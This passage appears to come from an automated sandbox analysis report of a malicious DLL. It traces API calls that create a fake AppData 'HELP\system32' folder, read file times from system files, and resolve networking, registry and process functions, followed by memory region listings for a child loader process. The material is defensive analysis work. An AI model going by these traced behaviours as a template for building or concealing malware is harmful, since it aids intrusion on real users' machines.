(lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0033.850] GetLastError () returned 0xb7 [0033.850] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0033.850] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0033.850] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0033.850] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0033.851] wsprintfA (in: param_1=0x2cf198, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.851] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0033.851] wsprintfA (in: param_1=0x2cf094, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0033.851] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.851] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0033.851] CloseHandle (hObject=0x74) returned 1 [0033.851] GetLastError () returned 0x0 [0033.851] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0033.851] GetLastError () returned 0x0 [0033.851] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0033.851] GetSystemDirectoryA (in: lpBuffer=0x2cf198, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0033.851] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0033.851] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0033.851] CloseHandle (hObject=0x74) returned 1 [0033.851] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.852] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.852] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0033.853] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0033.853] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0033.853] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0033.853] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0033.853] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0033.853] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0033.853] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0033.853] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0033.853] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0033.853] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0033.853] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0033.853] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0033.853] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0033.853] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0033.854] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0033.855] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0033.855] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0033.855] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0033.855] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0033.855] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0033.855] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0033.855] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0033.855] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0033.855] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0033.855] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0033.855] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0033.855] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0033.855] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0033.855] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0033.855] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0033.855] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0033.855] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0033.855] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0033.855] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0033.855] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0033.856] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0033.856] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0033.856] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0033.856] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0033.856] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0033.856] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0033.856] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.856] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.856] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0033.856] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0033.857] HeapDestroy (hHeap=0x1c0000) returned 1 Process: id = "39" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb00" os_pid = "0xc48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllUnregisterServer /fn_args=\"DefaultInstall\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1763 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1764 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1765 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1766 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1767 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1768 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1769 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1770 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1771 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1772 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1773 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1774 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1775 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1776 start_va = 0x4a0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 1777 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1778 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1779 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1780 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1781 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1782 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1783 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1784 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1785 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1786 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1787 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1788 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1789 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 1790 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1791 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1792 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1793 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1794 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 1795 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 1796 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1797 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1798 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1799 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1800 start_va = 0x1200000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1801 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1802 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1803 start_va = 0x1200000 end_va = 0x133ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1804 start_va = 0x1360000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Thread: id = 84 os_tid = 0xc4c [0033.900] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af4b4 | out: lpSystemTimeAsFileTime=0x2af4b4*(dwLowDateTime=0xe1e51450, dwHighDateTime=0x1d3dfba)) [0033.900] GetCurrentProcessId () returned 0xc48 [0033.900] GetCurrentThreadId () returned 0xc4c [0033.900] GetTickCount () returned 0x179c1 [0033.900] QueryPerformanceCounter (in: lpPerformanceCount=0x2af4ac | out: lpPerformanceCount=0x2af4ac*=368957179) returned 1 [0033.901] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.901] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0033.901] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0033.901] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0033.901] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0033.901] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.901] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.902] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.902] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.902] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.902] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.902] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.902] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.902] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.902] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.902] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.902] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.902] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.902] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.903] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.903] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.903] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.903] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.903] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0033.903] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0033.903] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0033.903] GetCurrentThreadId () returned 0xc4c [0033.903] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllUnregisterServer /fn_args=\"DefaultInstall\"" [0033.903] GetEnvironmentStringsW () returned 0xa7990* [0033.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0033.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13609f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0033.903] FreeEnvironmentStringsW (penv=0xa7990) returned 1 [0033.904] GetStartupInfoA (in: lpStartupInfo=0x2af404 | out: lpStartupInfo=0x2af404*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0033.904] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0033.904] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0033.904] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0033.904] SetHandleCount (uNumber=0x20) returned 0x20 [0033.904] GetLastError () returned 0x0 [0033.904] SetLastError (dwErrCode=0x0) [0033.904] GetLastError () returned 0x0 [0033.904] SetLastError (dwErrCode=0x0) [0033.904] GetLastError () returned 0x0 [0033.904] SetLastError (dwErrCode=0x0) [0033.904] GetACP () returned 0x4e4 [0033.904] GetLastError () returned 0x0 [0033.904] SetLastError (dwErrCode=0x0) [0033.904] IsValidCodePage (CodePage=0x4e4) returned 1 [0033.904] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2af3e4 | out: lpCPInfo=0x2af3e4) returned 1 [0033.904] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2aeeb0 | out: lpCPInfo=0x2aeeb0) returned 1 [0033.904] GetLastError () returned 0x0 [0033.904] SetLastError (dwErrCode=0x0) [0033.904] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x2aee40 | out: lpCharType=0x2aee40) returned 1 [0033.904] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af2c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.904] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af2c4, cbMultiByte=256, lpWideCharStr=0x2aec28, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.904] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x2aeec4 | out: lpCharType=0x2aeec4) returned 1 [0033.904] GetLastError () returned 0x0 [0033.904] SetLastError (dwErrCode=0x0) [0033.904] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0033.904] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af2c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.904] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af2c4, cbMultiByte=256, lpWideCharStr=0x2aebf8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ끞矲狰Ā") returned 256 [0033.904] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 